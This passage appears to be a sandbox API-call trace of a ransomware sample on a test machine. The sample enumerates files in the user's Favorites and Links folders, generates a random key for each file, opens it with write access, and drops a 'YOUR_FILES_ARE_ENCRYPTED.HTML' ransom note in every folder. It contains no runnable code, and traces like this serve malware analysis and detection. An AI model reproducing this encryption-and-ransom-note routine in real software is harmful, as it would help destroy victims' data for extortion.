ftCreationTime.dwLowDateTime=0xd24029b0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd24029b0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd619a2f0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x60, cFileName="MSN Money.url", cAlternateFileName="MSNMON~1.URL")) returned 1 [0167.436] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\MSN Websites\\MSN Money.url") returned 60 [0167.436] lstrcmpW (lpString1="MSN Money.url", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0167.436] PathFindExtensionW (pszPath="MSN Money.url") returned=".url" [0167.436] lstrlenW (lpString=".url") returned 4 [0167.436] PathFindExtensionW (pszPath="MSN Money.url") returned=".url" [0167.436] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0167.437] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\MSN Websites\\MSN Money.url" (normalized: "c:\\users\\5alr3u30d3\\favorites\\msn websites\\msn money.url"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 [0167.437] GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=133) returned 1 [0167.437] CloseHandle (hObject=0x598) returned 1 [0167.437] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd24029b0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd24029b0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd619a2f0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x60, cFileName="MSN Sports.url", 
cAlternateFileName="MSNSPO~1.URL")) returned 1 [0167.437] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\MSN Websites\\MSN Sports.url") returned 61 [0167.437] lstrcmpW (lpString1="MSN Sports.url", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0167.437] PathFindExtensionW (pszPath="MSN Sports.url") returned=".url" [0167.437] lstrlenW (lpString=".url") returned 4 [0167.437] PathFindExtensionW (pszPath="MSN Sports.url") returned=".url" [0167.437] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0167.437] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\MSN Websites\\MSN Sports.url" (normalized: "c:\\users\\5alr3u30d3\\favorites\\msn websites\\msn sports.url"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 [0167.438] GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=133) returned 1 [0167.438] CloseHandle (hObject=0x598) returned 1 [0167.438] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd24029b0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd24029b0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd619a2f0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x60, cFileName="MSN.url", cAlternateFileName="")) returned 1 [0167.438] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\MSN Websites\\MSN.url") returned 54 [0167.438] lstrcmpW (lpString1="MSN.url", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0167.438] PathFindExtensionW (pszPath="MSN.url") 
returned=".url" [0167.438] lstrlenW (lpString=".url") returned 4 [0167.438] PathFindExtensionW (pszPath="MSN.url") returned=".url" [0167.438] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0167.438] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\MSN Websites\\MSN.url" (normalized: "c:\\users\\5alr3u30d3\\favorites\\msn websites\\msn.url"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 [0167.438] GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=133) returned 1 [0167.438] CloseHandle (hObject=0x598) returned 1 [0167.438] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd24029b0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd24029b0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd619a2f0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x60, cFileName="MSNBC News.url", cAlternateFileName="MSNBCN~1.URL")) returned 1 [0167.438] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\MSN Websites\\MSNBC News.url") returned 61 [0167.438] lstrcmpW (lpString1="MSNBC News.url", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0167.438] PathFindExtensionW (pszPath="MSNBC News.url") returned=".url" [0167.438] lstrlenW (lpString=".url") returned 4 [0167.438] PathFindExtensionW (pszPath="MSNBC News.url") returned=".url" [0167.438] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0167.439] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\MSN Websites\\MSNBC News.url" 
(normalized: "c:\\users\\5alr3u30d3\\favorites\\msn websites\\msnbc news.url"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 [0167.439] GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=133) returned 1 [0167.439] CloseHandle (hObject=0x598) returned 1 [0167.439] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd24029b0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd24029b0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd619a2f0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x60, cFileName="MSNBC News.url", cAlternateFileName="MSNBCN~1.URL")) returned 0 [0167.439] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0167.439] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\MSN Websites\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 76 [0167.439] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\MSN Websites\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\favorites\\msn websites\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0167.439] WriteFile (in: hFile=0x5ac, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0167.442] CloseHandle (hObject=0x5ac) returned 1 [0167.442] GetProcessHeap () returned 0x270000 [0167.443] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | 
out: hHeap=0x270000) returned 1 [0167.443] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd236a430, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2428b10, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8a464b53, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Windows Live", cAlternateFileName="WINDOW~1")) returned 1 [0167.443] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\Windows Live") returned 46 [0167.443] GetProcessHeap () returned 0x270000 [0167.443] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74c2008 [0167.443] lstrcpyW (in: lpString1=0x74c2008, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\Windows Live" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\Windows Live") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\Windows Live" [0167.443] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\Windows Live", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\Windows Live\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\Windows Live\\*" [0167.443] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\Windows Live\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd236a430, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2428b10, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8a464b53, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0167.637] FindNextFileW (in: hFindFile=0x42f3180, 
lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd236a430, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2428b10, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8a464b53, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0167.637] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd24029b0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd24029b0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd61c0450, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x60, cFileName="Get Windows Live.url", cAlternateFileName="GETWIN~1.URL")) returned 1 [0167.637] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\Windows Live\\Get Windows Live.url") returned 67 [0167.637] lstrcmpW (lpString1="Get Windows Live.url", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0167.637] PathFindExtensionW (pszPath="Get Windows Live.url") returned=".url" [0167.637] lstrlenW (lpString=".url") returned 4 [0167.637] PathFindExtensionW (pszPath="Get Windows Live.url") returned=".url" [0167.637] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0167.637] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\Windows Live\\Get Windows Live.url" (normalized: "c:\\users\\5alr3u30d3\\favorites\\windows live\\get windows live.url"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 [0167.638] 
GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=133) returned 1 [0167.638] CloseHandle (hObject=0x598) returned 1 [0167.638] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd24029b0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd24029b0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd61c0450, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x60, cFileName="Windows Live Gallery.url", cAlternateFileName="WINDOW~2.URL")) returned 1 [0167.638] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\Windows Live\\Windows Live Gallery.url") returned 71 [0167.638] lstrcmpW (lpString1="Windows Live Gallery.url", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0167.638] PathFindExtensionW (pszPath="Windows Live Gallery.url") returned=".url" [0167.638] lstrlenW (lpString=".url") returned 4 [0167.638] PathFindExtensionW (pszPath="Windows Live Gallery.url") returned=".url" [0167.638] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0167.638] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\Windows Live\\Windows Live Gallery.url" (normalized: "c:\\users\\5alr3u30d3\\favorites\\windows live\\windows live gallery.url"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 [0167.639] GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=133) returned 1 [0167.639] CloseHandle (hObject=0x598) returned 1 [0167.639] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, 
ftCreationTime.dwLowDateTime=0xd24029b0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd24029b0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd619a2f0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x60, cFileName="Windows Live Mail.url", cAlternateFileName="WINDOW~1.URL")) returned 1 [0167.640] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\Windows Live\\Windows Live Mail.url") returned 68 [0167.640] lstrcmpW (lpString1="Windows Live Mail.url", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0167.640] PathFindExtensionW (pszPath="Windows Live Mail.url") returned=".url" [0167.640] lstrlenW (lpString=".url") returned 4 [0167.640] PathFindExtensionW (pszPath="Windows Live Mail.url") returned=".url" [0167.640] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0167.640] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\Windows Live\\Windows Live Mail.url" (normalized: "c:\\users\\5alr3u30d3\\favorites\\windows live\\windows live mail.url"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 [0167.640] GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=133) returned 1 [0167.640] CloseHandle (hObject=0x598) returned 1 [0167.640] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd24029b0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd24029b0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd619a2f0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x85, 
dwReserved0=0x0, dwReserved1=0x60, cFileName="Windows Live Spaces.url", cAlternateFileName="WINDOW~3.URL")) returned 1 [0167.640] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\Windows Live\\Windows Live Spaces.url") returned 70 [0167.640] lstrcmpW (lpString1="Windows Live Spaces.url", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0167.640] PathFindExtensionW (pszPath="Windows Live Spaces.url") returned=".url" [0167.640] lstrlenW (lpString=".url") returned 4 [0167.640] PathFindExtensionW (pszPath="Windows Live Spaces.url") returned=".url" [0167.640] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0167.640] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\Windows Live\\Windows Live Spaces.url" (normalized: "c:\\users\\5alr3u30d3\\favorites\\windows live\\windows live spaces.url"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 [0167.643] GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=133) returned 1 [0167.643] CloseHandle (hObject=0x598) returned 1 [0167.643] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd24029b0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd24029b0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd619a2f0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x60, cFileName="Windows Live Spaces.url", cAlternateFileName="WINDOW~3.URL")) returned 0 [0167.643] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0167.643] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: 
pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\Windows Live\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 76 [0167.643] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\Windows Live\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\favorites\\windows live\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0167.644] WriteFile (in: hFile=0x5ac, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0167.646] CloseHandle (hObject=0x5ac) returned 1 [0167.646] GetProcessHeap () returned 0x270000 [0167.647] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0167.647] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd236a430, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2428b10, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8a464b53, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Windows Live", cAlternateFileName="WINDOW~1")) returned 0 [0167.647] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0167.647] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 63 [0167.647] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\favorites\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 
dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a0 [0167.647] WriteFile (in: hFile=0x5a0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0167.649] CloseHandle (hObject=0x5a0) returned 1 [0167.649] GetProcessHeap () returned 0x270000 [0167.650] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa168 | out: hHeap=0x270000) returned 1 [0167.650] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd236a430, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xad56beb0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xad56beb0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Links", cAlternateFileName="")) returned 1 [0167.650] wnsprintfW (in: pszDest=0x74ea160, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Links") returned 29 [0167.650] GetProcessHeap () returned 0x270000 [0167.650] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa168 [0167.650] lstrcpyW (in: lpString1=0x74fa168, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Links" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Links") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Links" [0167.650] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Links", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Links\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Links\\*" [0167.650] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Links\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd236a430, ftCreationTime.dwHighDateTime=0x1d70517, 
ftLastAccessTime.dwLowDateTime=0xad56beb0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xad56beb0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0167.650] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd236a430, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xad56beb0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xad56beb0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0167.650] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0xd24029b0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd24029b0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd5bf2eb0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x244, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0167.650] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Links\\desktop.ini") returned 41 [0167.650] lstrcmpW (lpString1="desktop.ini", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0167.650] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0167.650] lstrlenW (lpString=".ini") returned 4 [0167.650] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0167.650] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd24029b0, 
ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd24029b0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd5bf2eb0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x1c8, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Desktop.lnk", cAlternateFileName="")) returned 1 [0167.650] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Links\\Desktop.lnk") returned 41 [0167.651] lstrcmpW (lpString1="Desktop.lnk", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0167.651] PathFindExtensionW (pszPath="Desktop.lnk") returned=".lnk" [0167.651] lstrlenW (lpString=".lnk") returned 4 [0167.651] PathFindExtensionW (pszPath="Desktop.lnk") returned=".lnk" [0167.651] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd24029b0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd24029b0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd5bf2eb0, 